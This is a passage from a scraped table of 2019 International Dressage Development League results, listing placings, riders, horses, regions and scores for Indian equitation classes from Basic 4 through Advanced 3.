3,664 |
2019 1IQ |
Equitation Basic 4 |
74 |
1 |
Anyam Satya Haneeth |
Victor |
INDIA-South |
76.388 |
1 |
|
EQB4 |
3,665 |
2019 1IQ |
Equitation Basic 4 |
74 |
2 |
M.Greeshima Varsha |
Victor |
INDIA-South |
72.777 |
2 |
|
EQB4 |
3,666 |
2019 1IQ |
Equitation Basic 4 |
74 |
3 |
Lipika Pilli |
Victor |
INDIA-South |
70.833 |
3 |
|
EQB4 |
3,667 |
2019 1IQ |
Equitation Basic 5 |
75 |
1 |
Praveen Kumar |
Maverick |
INDIA-North |
79.000 |
1 |
|
EQB5 |
3,668 |
2019 1IQ |
Equitation Basic 5 |
75 |
2 |
Praveen Kumar |
Yuvraj |
INDIA-North |
75.000 |
2 |
|
EQB5 |
3,669 |
2019 1IQ |
Equitation Advanced 1 |
76 |
1 |
Rethifar Imen Zahir |
Pelican Creek |
INDIA-South |
77.500 |
1 |
|
EQA1 |
3,670 |
2019 1IQ |
Equitation Advanced 1 |
76 |
2 |
Nivriti Vijooke |
Orochi |
INDIA-South |
73.958 |
2 |
|
EQA1 |
3,671 |
2019 1IQ |
Equitation Advanced 1 |
76 |
3 |
Anika Khanna |
Shadow |
INDIA-North |
73.125 |
1 |
|
EQA1 |
3,672 |
2019 1IQ |
Equitation Advanced 1 |
76 |
4 |
Aamna Singh Jhingan |
Shadow |
INDIA-North |
71.458 |
2 |
|
EQA1 |
3,673 |
2019 1IQ |
Equitation Advanced 1 |
76 |
5 |
Kenza Jehane |
Sugar |
INDIA-North |
70.208 |
3 |
|
EQA1 |
3,674 |
2019 1IQ |
Equitation Advanced 1 |
76 |
6 |
Abinav Dokania |
War Bird |
INDIA-South |
69.792 |
3 |
|
EQA1 |
3,675 |
2019 1IQ |
Equitation Advanced 1 |
76 |
7 |
Kunal Vadehra |
Sugar |
INDIA-North |
69.375 |
4 |
|
EQA1 |
3,676 |
2019 1IQ |
Equitation Advanced 1 |
76 |
8 |
Naman Krishnan |
Sugar |
INDIA-North |
69.167 |
5 |
|
EQA1 |
3,677 |
2019 1IQ |
Equitation Advanced 1 |
76 |
9 |
Neksh Jain |
Magic |
INDIA-North |
67.083 |
6 |
|
EQA1 |
3,678 |
2019 1IQ |
Equitation Advanced 1 |
76 |
10 |
Shaurya Saxena |
Magic |
INDIA-North |
66.667 |
7 |
|
EQA1 |
3,679 |
2019 1IQ |
Equitation Advanced 1 |
76 |
11 |
Jahaan Fateh Dhaliwal |
Phillip |
INDIA-North |
63.333 |
8 |
|
EQA1 |
3,680 |
2019 1IQ |
Equitation Advanced 1 |
76 |
12 |
Yash Jaipuria |
Crystal Queen |
INDIA-North |
62.708 |
9 |
|
EQA1 |
3,681 |
2019 1IQ |
Equitation Advanced 2 |
77 |
1 |
Archit Bhatele |
Yuvraj |
INDIA-North |
78.221 |
1 |
|
EQA2 |
3,682 |
2019 1IQ |
Equitation Advanced 2 |
77 |
2 |
Kaviya Selvaraj |
Orochi |
INDIA-South |
74.792 |
1 |
|
EQA2 |
3,683 |
2019 1IQ |
Equitation Advanced 2 |
77 |
3 |
B. Manoj |
Victor |
INDIA-South |
73.958 |
2 |
|
EQA2 |
3,684 |
2019 1IQ |
Equitation Advanced 2 |
77 |
3 |
Akshara Chitty Babu |
Sky's Your Limit |
INDIA-South |
73.958 |
2 |
|
EQA2 |
3,685 |
2019 1IQ |
Equitation Advanced 2 |
77 |
5 |
Aadhithya Srinivasan |
Pelican Creek |
INDIA-South |
73.333 |
4 |
|
EQA2 |
3,686 |
2019 1IQ |
Equitation Advanced 2 |
77 |
6 |
Jaiveer Mishra |
Grey Gaston |
INDIA-North |
71.875 |
2 |
|
EQA2 |
3,687 |
2019 1IQ |
Equitation Advanced 2 |
77 |
6 |
Manav Chordia |
Red Indian |
INDIA-South |
71.875 |
5 |
|
EQA2 |
3,688 |
2019 1IQ |
Equitation Advanced 2 |
77 |
8 |
Krithika Logendra Kumar |
Sky's Your Limit |
INDIA-South |
71.042 |
6 |
|
EQA2 |
3,689 |
2019 1IQ |
Equitation Advanced 2 |
77 |
9 |
Saanvi Krishan |
Bitti Begum |
INDIA-North |
70.208 |
3 |
|
EQA2 |
3,690 |
2019 1IQ |
Equitation Advanced 2 |
77 |
10 |
Gayatri Sundaravadanan |
Pelican Creek |
INDIA-South |
70.000 |
7 |
|
EQA2 |
3,691 |
2019 1IQ |
Equitation Advanced 2 |
77 |
11 |
Diya Simon |
War Bird |
INDIA-South |
68.125 |
8 |
|
EQA2 |
3,692 |
2019 1IQ |
Equitation Advanced 2 |
77 |
12 |
Prithviraj Singh |
Ralph |
INDIA-North |
61.667 |
4 |
|
EQA2 |
3,693 |
2019 1IQ |
Equitation Advanced 3 |
78 |
1 |
Praveen Kumar |
Maverick |
INDIA-North |
79.000 |
1 |
|
EQA3 |
3,694 |
2019 1IQ |
Equitation Advanced 3 |
78 |
2 |
Praveen Kumar |
Yuvraj |
INDIA-North |
78.000 |
2 |
|
EQA3 |
3,695 |
© 2016 International Dressage Development League
Please confirm deletion. There is no undo!